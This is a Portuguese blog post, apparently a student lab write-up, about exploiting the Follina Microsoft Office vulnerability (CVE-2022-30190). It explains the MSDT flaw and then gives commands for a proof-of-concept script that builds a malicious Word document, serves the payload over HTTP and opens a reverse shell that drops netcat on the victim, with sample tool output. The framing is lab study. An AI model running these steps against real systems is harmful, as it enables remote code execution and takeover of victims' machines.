
Follina (CVE-2022-30190) é uma vulnerabilidade de dia zero do Microsoft Office que foi recentemente descoberta. É uma vulnerabilidade de alta gravidade que os hackers podem aproveitar para ataques de execução remota de código (RCE).
Amine TITROFINE | 17 de dezembro de 2022
Follina (CVE-2022-30190) é uma vulnerabilidade de dia zero do Microsoft Office que foi recentemente descoberta. É uma vulnerabilidade de alta gravidade que os hackers podem usar para ataques de execução remota de código (RCE). Ela existe quando o MSDT é chamado usando o protocolo URL a partir de um aplicativo chamador, como o Word. Um atacante que explore com sucesso esta vulnerabilidade pode executar código arbitrário com os privilégios do aplicativo chamador. O atacante pode então instalar programas, visualizar, alterar ou excluir dados, ou criar novas contas no contexto permitido pelos direitos do usuário.
2 VMs :
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git
$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri
$ python3 follina.py –r 9999
Após executar o programa follina.py, um arquivo ( follina.doc ) aparecerá, contendo um script malicioso .
Para facilitar o compartilhamento de arquivos entre as duas VMs, usaremos o servidor HTTP Python
$ python3 –m http.server 8080
Obtenha uma reverse shell na porta 9999. Nota: isso baixa um binário netcat para a vítima e o coloca em C:\Windows\Tasks. Ele não limpa o binário. Isso acionará detecções de antivírus, a menos que o Antivírus esteja desabilitado.
$ python3 follina.py -r 9999
Execute calc.exe:
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
Execute notepad.exe:
$ python3 follina.py -c "notepad"